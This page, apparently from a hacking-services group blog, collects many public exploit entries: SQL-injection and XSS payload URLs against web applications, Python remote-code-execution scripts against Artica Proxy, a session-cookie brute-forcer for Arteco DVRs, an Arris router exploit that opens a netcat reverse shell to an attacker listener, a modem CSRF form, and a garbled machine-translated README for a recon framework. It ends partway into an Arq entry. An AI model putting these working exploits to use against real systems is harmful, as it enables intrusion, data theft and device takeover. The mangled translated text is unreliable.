Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863113894

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/69307/info

ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ArticleFR 3.0.4 is vulnerable; prior versions may also be affected. 

http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
HireHackking 
# # # # # 
# Vulnerability: Improper Access Restrictions 
# Date: 15.01.2017
# Vendor Homepage: http://www.e-soft24.com/
# Script Name: Article Directory Script Seo
# Script Version: V3.2
# Script Buy Now: http://www.e-soft24.com/article-directory-script-seo-p-338.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/alldoc.php
# http://localhost/[PATH]/admin/editdoc.php
# http://localhost/[PATH]/admin/editdoc.php?doc_id=1
# Vs.......
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Article Directory Script 3.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.yourarticlesdirectory.com/
# Software Link: http://www.yourarticlesdirectory.com/
# Demo: http://www.yourarticlesdirectory.com/livedemo.php
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15960
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/category.php?id=[SQL]
# 
# 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+-
# 
# http://localhost/[PATH]/author.php?id=[SQL]
# 
# Parameter: id (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: id=18 AND 8646=8646
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: id=18 AND SLEEP(5)
# 
# Parameter: id (GET)
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: id=27 AND SLEEP(5)
# 	
# Etc..
# # # # #
HireHackking 
[+] Credits: John Page (aka Hyp3rlinX)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec            
 


Vendor:
=======
www.articatech.com



Product:
=========
Artica Web Proxy v.3.06.112216 


Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
and employees from risks posed by the Internet.



Vulnerability Type:
===================
Remote Code Execution 



CVE Reference:
==============
CVE-2017-17055



Security Issue:
================
Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root. 
However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.

Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker
supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server
abusing the system.terminal.php functionality. Result is attacker takeover of the artica server.



Exploit/POC:
=============
1) Steal artica Server "/etc/shadow" password file.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to /tmp dir.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E


Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=============================
Vendor Notification: November 28, 2017  
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054

you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054


import requests
import base64
import urllib3
from colorama import Fore

print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")

URL = input("Enter url: ")
if URL[-1]=="/":
    ACTUAL_URL = URL[:-1]
else:
    ACTUAL_URL = URL

ARTICA_URL = ACTUAL_URL

def check(ARTICA_URL):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
    except Exception as e:
        print(Fore.RED+"Could not reach, check URL")
    if check.status_code==200:
        print(Fore.GREEN+"Vulnerable")
        return True
    else:
        print(Fore.RED+"Not Vulnerable")


def exploit(ARTICA_URL):

    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
    payload_data = {
        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
            "cache_serializer": "json",
            "cache_size": 999999999,
            "cache_data": {
                payload: {
                    "cache_date": 0,
                    "ttl": 999999999
                }
            }
        }
    }


    while True:
        PAYLOAD_CMD = input("enter command: ")
        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        response = requests.get(url, verify=False)
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        if response.status_code == 200:
            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
            cmd_response = requests.get(cmd_url, verify=False)
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            print(cmd_response.text)
        else:
            print("Failed to execute the payload")

check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
    exploit(ARTICA_URL=ARTICA_URL)
HireHackking 
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506

import requests
import argparse
from bs4 import BeautifulSoup


def bypass_auth(session, args):
    login_endpoint = "/fw.login.php?apikey="
    payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"

    print("[+] Bypassing authentication...")
    session.get(args.host + login_endpoint + payload, verify=False)

    return session


def run_command(session, args):
    cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
    print("[+] Running command: {}".format(args.command))
    response = session.post(args.host + cmd_endpoint, verify=False)
    soup = BeautifulSoup(response.text, "html.parser")
    print(soup.find_all("code")[1].get_text())


def main():
    parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
    parser.add_argument(
        "--host", help="The host to target. Format example: https://host:port",
    )
    parser.add_argument("--command", help="The command to run")

    args = parser.parse_args()
    if not args.host or not args.command:
        parser.print_help()
        exit(0)
    session = requests.Session()
    session = bypass_auth(session, args)

    run_command(session, args)


if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://artha.sourceforge.net
# Software Link: https://netcologne.dl.sourceforge.net/project/artha/artha/1.0.3/artha_1.0.3.0.exe
# Version: 1.0.3.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Query / Search

#!/usr/bin/python
    
buffer = "A" * 256
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."
HireHackking 
# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
# Date: 16.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.arteco-global.com

#!/usr/bin/env python3
#
#
# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
#
#
# Vendor: Arteco S.U.R.L.
# Product web page: https://www.arteco-global.com
# Affected version: n/a
#
# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
# ideal for those who need to manage IP video surveillance designed for
# medium to large installations that require high performance and reliability.
# Arteco can handle IP video sources from all major international manufacturers
# and is compatible with ONVIF and RTSP devices.
#
# Desc: The Session ID 'SessionId' is of an insufficient length and can be
# exploited by brute force, which may allow a remote attacker to obtain a
# valid session, bypass authentication and disclose the live camera stream.
#
# Tested on: Microsoft Windows 10 Enterprise
#            Apache/2.4.39 (Win64) OpenSSL/1.0.2s
#            Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
#            Arteco-Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5613
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
#
#
# 16.11.2020
#

import sys,requests

class BrutusCookius:

    def __init__(self):
        self.validate=None
        self.cookies=None#
        self.params=None##
        self.stream=None##
        self.path=None####
        self.cgi=None#####
        self.ip=None######
        self.op=None######

    def check(self):
    	print('Usage: ./arteco.py IP')
    	exit(9)

    def bro(self):
        if len(sys.argv) !=2:
            self.check()
        else:    
            self.ip=sys.argv[1]
            print('[+] Target IP: '+self.ip)
            if not 'http' in self.ip:
                self.ip='http://{}'.format(self.ip)

    def force(self):

        # Check the Set-Cookie on the target and determine the length (varies per model/version)
        # Cookie: SessionId=15800 - range(10000,100000)
        # Cookie: SessionId=8350 - range(1000,10000)
        # Cookie: SessionId=502 - range(100,1000)

        self.op = range(17129,17149) # Tweak
        for j in self.op:
            session=requests.session()
            self.cookies=dict(SessionId=str(j))
            sys.stdout.write('[+] Trying ID: '+str(j))
            self.path='/arteco-mobile/'
            self.cgi='camera.fcgi'
            self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
            self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers
            if not 'artecomobile' in str(self.validate):
                print(' - NOPE.')
            else:
                print(' - BINGO!!!')
                print('[+] Active session found: '+str(j))
                print('[+] Use the cookie: SessionId='+str(j))
                exit(9)
        print('[!] Sorry, no valid session found.')

    def main(self):
        self.bro()
        self.force()

if __name__ == '__main__':
    BrutusCookius().main()
HireHackking 
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on:  XAMPP / Windows 10
# CVE :  CVE-2023-23163

# Proof of Concept:

# 1- Install The application Art Gallery Management System Project v1.0

# 2- Navigate to admin login page and login with the valid username and password<admin:Test@123>.
  URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php

# 3- Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar.

# 4- Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type.

# 5- Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows.

# 6- Now inject the payload double single quote ('') in the "editid" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.

# 7- Now find how many column are returns by the SQL query. this query will return 6 column.
  Payload:editid=6%27order%20by%203%20--%20-

# 8- For manually get data of database insert the below payload to see the user of the database.
  payload: editid=-6%27union%20all%20select%201,user(),3--%20-

# 9- Now to get all database data use below "sqlmap" command to fetch all the data.
 Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch
HireHackking 
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on:  XAMPP / Windows 10
# CVE :  CVE-2023-23162

# Proof of Concept:

# 1- Install The application Art Gallery Management System Project v1.0
# 2- Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu.
# 3- Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown.
# 4- Now inject the payload double single quote ('') in the "cid" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.
# 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.
 Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures

# 6- for manually getting data from the database insert the below payload to see the user of the database.
 payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs

# 7- for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt".
# 8- now to get all database data use the below "sqlmap" command to fetch all the data.
 Command: sqlmap -r request.txt -p cid --dump-all --batch

# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
"
HireHackking 
# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on:  XAMPP / Windows 10
# CVE :  CVE-2023-23161

# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0

# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints

# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 5- XSS has been triggered.

# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
"
XSS will trigger.
HireHackking 
# Exploit Title: Art Gallery Management System Project in PHP v 1.0 - SQL injection
# Date: 31-01-2023
# Exploit Author: Yogesh Verma
# Vendor Homepage: https://y0gesh-verma.github.io/
# Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/, https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: Windows/Linux
# CVE : CVE-2023-23156



#!/usr/bin/python
import sys
import requests

tmp = requests.Session()
db_name = ""
database = ""
if len(sys.argv) == 2:
    url = sys.argv[1]
    for i in range(1, 7):
        for j in range(32, 126):
            sql_payload = f"'UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select*from(select (ascii(substr(database(),{i},1))={j}))a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL'"
            data = {'pid': '-1' + sql_payload}
            r = tmp.get(url, params=data)
            if "Dimension : 1" in r.text:
                db_name += chr(j)
    database += db_name
    if len(db_name)>1:
        print('\n'+"Fetching current database :")
        print(database)
        print('\n'+"vulnerable to CVE-2023-23156")
    else:
        print("Not vulnerable to CVE-2023-23156")
else:
    print("Error: Please provide the URL as an argument.")
    print("Example: script.py https://example.com/single-product.php")
HireHackking 
source: https://www.securityfocus.com/bid/48083/info

ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected. 

SQL injection:

http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

Cross-site Scripting:

http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking

AVvXsEgLJuDrtix83kgvlBSd-ACckYjVAatjmSkt

Howdy!我的名字叫哈里森马云惹不起马云理查森(Harrison Richardson),即卢比(RS0N)(纵火案),当我想让自己凉爽的时候。此存储库中的代码始于一小部分脚本,以帮助自动化我发现自己重复的许多常见的错误赏金狩猎过程。随着时间的流逝,我构建了一个具有MongoDB连接的简单Web应用程序,以管理我的发现并确定有价值的数据点。经过5年的Bug Bounty狩猎,无论是兼职还是全日制,我终于准备将此工具集合到适当的框架中。

ARS0N框架旨在为有抱负的应用程序安全工程师提供所需的所有工具,以利用Bug Bounty Hunting作为学习有价值的,现实世界中的Appsec概念并做到这一点的手段!我的目标是通过提供易于使用的自动化工具与教育内容以及针对广泛的基于Web和基于云的漏洞的方式提供易于使用的自动化工具,以降低错误赏金狩猎的入境障碍。结合我的YouTube内容,此框架将帮助有抱负的应用程序安全工程师快速,轻松地理解现实世界中的安全概念,这些概念直接转化为网络安全领域的高薪职业。

除了将此工具用于漏洞赏金狩猎外,有抱负的工程师还可以将此GitHub存储库用作画布来练习与其他开发人员合作!该工具的灵感来自Metasploit,并以类似的方式设计为模块化。每个脚本(ex: wildfire.py或slowburn.py)基本上都是一种算法,该算法以特定的模式运行模块(ex: fire-starter.py或fire-scanner.py),以获得所需的结果。由于这种设计,社区可以自由构建新脚本来求解特定的用例或模块以扩展这些脚本的结果。通过在此框架中学习代码并使用Github贡献自己的代码,有抱负的工程师将继续学习可在安全工程师I职位的第一天应用的现实世界技能。

我希望这个模块化框架将充当画布,以帮助分享我在职业生涯中学到的知识与下一代安全工程师!相信我,我们需要我们能获得的所有帮助!

快速启动

将此代码粘贴到卡利Linux 2023.4的干净安装中,以下载,安装和运行Framework的最新稳定Alpha版本:

sudo apt更新sudo apt-get更新

sudo apt -y升级sudo apt -get -y升级

WGET https://GITHUB.com/r-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz

TAR -XZVF ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

RM ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

CD ARS0N-FRAMEWORK

./install.sh

下载最新稳定的alpha版本

WGET https://Github.com/r-s0n/ars0n-framework/releases/download/download/v0.2-alpha/ars0n-framework-v0.0.0.2-12-alpha.2-alpha.tar.tar.gz

TAR -XZVF ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

RM ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

安装

ARS0N框架包括一个脚本,该脚本安装了所有必要的工具,软件包等,这些脚本在清洁安装Kali Linux 2023.4上运行框架所需的脚本。

请注意,此框架的唯一支持安装是在卡利Linux 2023.3的清洁安装上。如果您选择尝试在干净的Kali安装之外运行框架,如果您有任何问题,我将无法帮助故障排除。/install.sh此视频准确地显示了成功安装的期望。

如果您使用的是ARM处理器,则需要将-arm标志添加到所有安装/运行脚本./install.sh -Arm中,当安装开始时,将提示您进入各种API键和令牌。输入这些并不需要运行框架的核心功能。如果您在安装时不输入这些API键和令牌,只需在每个提示中点击输入即可。键稍后可以添加到〜/.keys目录。有关如何手动添加这些键的更多信息,请访问此读数的常见问题部分。

运行Web应用程序(客户端和服务器)

安装完成后,您将获得通过输入Y来运行应用程序的选项。如果您不选择立即运行该应用程序,或者如果需要在重新启动后需要运行该应用程序,请直接直接导航到run.sh run.sh bash脚本。

./run.sh如果您使用的是ARM处理器,则需要将-arm标志添加到所有安装/运行脚本./run.sh -arm

核心模块

中,ARS0N Framework的核心模块用于确定基本的扫描逻辑。每个脚本旨在根据用户试图完成的操作来支持特定的侦察方法。

野火

目前,野火脚本是ARS0N框架中使用最广泛的核心模块。该模块的目的是允许用户扫描多个目标,这些目标允许对研究人员发现的任何子域进行测试。

它如何工作:

用户通过图形用户界面(GUI)添加了根域,他们希望根据上次扫描这些域中的每个域中的每个域,以确保使用基于用户提供的标志的标志来确保对每个野火扫描的每个域进行扫描,以确保使用最古老的数据进行扫描的每个域扫描域的域。如果所有子模型都在运行,则大多数野火扫描需要8到48小时才能完成。此计时的变化可能是由许多因素引起的,包括目标应用程序和运行框架的机器。

另外,请注意,在扫描完成之前,大多数数据不会在GUI中显示。最好尝试在一个周末或周末进行扫描,具体取决于扫描的域数量,并在扫描完成后返回以从侦察到枚举。运行Wildfire:

图形用户界面(GUI)

野火可以使用仪表板上的野火按钮从GUI运行。单击后,前端将使用屏幕上的复选框来确定应将哪些标志传递给扫描仪。

请注意,从GUI进行的扫描仍然有一些尚未解决的错误和边缘案例。如果您有任何问题,则可以简单地将扫描形式运行CLI。

命令行接口(CLI)

ARS0N框架的所有核心模块都存储在/工具包目录中。只需导航到目录并用必要的标志运行wildfire.py。必须至少提供一个子模块标志。

Python3 Wildfire.py- start - -Cloud- -Scan

slowburn

与Wildfire模块不同,Wildfire模块要求用户识别目标域进行扫描,Slowburn模块对您有用。通过与API进行各种错误赏金狩猎平台进行通信,该脚本将确定所有允许在任何发现的子域进行测试的域。一旦数据填充,Slowburn将一次随机选择一个域以野火与野火相同的方式进行扫描。

请注意,Slowburn模块仍在开发中,不被视为稳定alpha版本的一部分。用户可能会遇到错误和边缘案例。为了使Slowburn识别扫描目标,必须首先对其进行初始化。此初始化步骤从各种API收集必要的数据,并将它们存储到本地存储的JSON文件中。一旦完成初始化步骤,Slowburn将一次自动开始选择和扫描一个目标。

要初始化slowburn,只需运行以下命令:

python3 slowburn.py- initialize一旦收集了数据,将取决于用户是否要在下一次扫描时重新定位该工具。

请记住,公共错误赏金程序上的范围和目标可能会经常改变。如果您选择在不初始化数据的情况下运行slowburn,则可能是该程序范围不再范围的扫描域。强烈建议在运行前每次都重新定位慢烧。如果您选择不重新定位目标数据,则可以使用以下命令:的先前收集的数据运行slowburn

python3 slowburn.py

子模块

ARS0N框架的子模块设计为将核心模块利用,以将重枚举阶段分为特定任务。每个子模块中收集的数据都被其他人用于扩展目标攻击表面的图片。

火 - 启动器

Fire-Starter是针对目标域进行侦察的第一步。该脚本的目的是收集有关目标攻击表面的大量信息。一旦收集,所有其他子模块都将使用此数据来帮助用户识别潜在脆弱的特定URL。

启动器可以通过运行一系列开源工具来列举隐藏的子域,DNS记录和ASN来确定这些外部条目托管的位置。目前,通过将以下使用以下广泛使用的开源工具链接在一起的工程:

Amass Sublist3R AssetFinder获取所有URL(GAU)证书透明度日志(CRT)子发现式Shuffledns Gospider子域启动器这些工具涵盖了广泛的技术,可以识别隐藏的子域,包括网络刮擦,蛮力,蛮力,爬行以识别链接和Javascript urls和Javascript url。

扫描完成后,将更新仪表板并向用户使用。 ARS0N框架中的大多数子模块都需要从火启动器模块收集的数据才能工作。考虑到这一点,必须将火启动器包括在第一次扫描中,以针对要收集的任何可用数据的目标。

fire-loud

即将推出.

fire-scanner

Fire-Scanner使用Fire-Starter和Fire-Cloud的结果对以前扫描中发现的所有子域和云服务进行宽带扫描。

在开发的这个阶段,该脚本几乎完全利用核几乎所有扫描。消防员不简单地运行该工具,而是将扫描分解为特定的核模板集合,并一一扫描它们。此策略有助于确保扫描稳定并产生一致的结果,消除任何不必要或不安全的扫描检查,并产生可行的结果。

故障排除

绝大多数安装和/或运行ARS0N框架的问题是由于没有在卡利Linux的清洁安装上安装工具而引起的。

重要的是要记住,从本质上讲,ARS0N框架是旨在运行现有开源工具的自动化脚本集合。这些工具中的每一个都有自己的操作方式,如果与用户系统上运行的任何现有服务/工具发生冲突,则可以体验意外的行为。这种复杂性是如何仅在卡利linux的清洁安装上运行ARS0N框架的原因。用户经历的另一个非常常见的问题是MongoDB未成功安装和/或在其计算机上运行。此问题最常见的表现是用户无法添加初始FQDN,而只是看到损坏的GUI。如果发生这种情况,请确保您的机器有运行MongoDB的必要系统要求。不幸的是,如果您遇到此问题,目前没有目前的解决方案。

常见问题

即将推出.

HireHackking 
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version:  eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->

<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
HireHackking 
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701

import requests
import base64

router_host = "http://192.168.0.1"
username = "admin"
password = "password"

lhost = "192.168.0.6"
lport = 80


def main():
    print("Authorizing...")
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        exit(-1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    send_payload(payload, cookie)
    print("Done, check shell..")

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def no_encode_params(params):
    return  "&".join("%s=%s" % (k,v) for k,v in params.items())

def get_cookie(header):
    url = router_host+"/login"
    params = no_encode_params({"arg":header, "_n":1})
    resp=requests.get(url, params=params)
    return resp.content.decode('UTF-8')

def set_oid(oid, cookie):
    url = router_host+"/snmpSet"
    params = no_encode_params({"oid":oid, "_n":1})
    cookies = {"credential":cookie}
    requests.get(url, params=params, cookies=cookies)

def gen_payload(h, p):
    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"

def send_payload(payload, cookie):
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
    

if __name__ == '__main__':
    main()
HireHackking 
=begin
As well as the other bugs affecting Arq <= 5.9.6 there is also another issue
with the suid-root restorer binaries in Arq for Mac. There are three of them
and they are used to execute restores of backed up files from the various
cloud providers.

